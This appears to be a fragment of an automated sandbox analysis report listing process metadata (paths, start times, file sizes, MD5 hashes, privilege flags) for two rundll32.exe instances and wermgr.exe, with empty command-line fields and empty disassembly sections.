Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 13:00:50 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffcd0000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:51 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 44544 bytes |
MD5 hash: | 51138BEEA3E2C21EC44D0932C71762A8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 13:00:52 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | |
Commandline: | |
Imagebase: | |
File size: | 50688 bytes |
MD5 hash: | 41DF7355A5A907E2C1D7804EC028965D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|